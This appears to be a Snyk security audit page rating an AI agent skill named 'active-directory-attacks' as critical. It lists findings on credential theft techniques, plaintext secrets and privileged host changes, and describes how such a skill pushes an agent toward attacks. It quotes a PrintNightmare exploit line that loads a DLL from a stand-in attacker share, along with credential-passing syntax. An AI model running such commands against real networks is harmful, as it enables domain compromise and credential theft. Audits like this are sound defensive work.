Skills
skills/sickn33/antigravity-awesome-skills/active-directory-attacks/Snyk

active-directory-attacks

Fail

Audited by Snyk on Apr 21, 2026

Risk Level: CRITICAL
Full Analysis

HIGH W007: Insecure credential handling detected in skill instructions.

  • Insecure credential handling detected (high risk: 1.00). The skill repeatedly shows and instructs embedding plaintext passwords, hashes, and credentials directly into commands and outputs (e.g., domain:user:password, -p 'password', -hashes :NTHASH), and lists extracted credentials/hashes as deliverables, requiring the LLM to handle and potentially output secret values verbatim.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This content is an explicit offensive playbook that provides step‑by‑step instructions for credential theft (Mimikatz, DCSync, secretsdump), authentication abuse (Kerberoast, AS-REP, NTLM relays), forging Kerberos tickets (Golden/Silver), lateral movement and privilege escalation, and techniques to establish persistent backdoors and remote code execution (GPO/SCCM/WSUS, malicious DLLs, machine account/RBCD abuse), and thus clearly facilitates intentional malicious compromise and data exfiltration.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The PrintNightmare example invokes a network UNC path \attacker\share\evil.dll at runtime (python3 CVE-2021-1675.py ... '\attacker\share\evil.dll'), which is a required external resource that the target will fetch and load to execute remote code, so it meets the criteria for a risky runtime external dependency.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs running privileged operations on the host (e.g., "sudo date -s"), and promotes tools/techniques that require or encourage elevation/bypassing protections (Mimikatz, psexec, secretsdump, faketime, hosting malicious payloads), so it pushes the agent to modify or compromise the machine's state.

Issues (4)

W007
HIGH

Insecure credential handling detected in skill instructions.

E006
CRITICAL

Malicious code pattern detected in skill scripts.

W012
MEDIUM

Unverifiable external dependency detected (runtime URL that controls agent).

W013
MEDIUM

Attempt to modify system services in skill instructions.

Audit Metadata
Risk Level
CRITICAL
Analyzed
Apr 21, 2026, 08:59 AM
Issues
4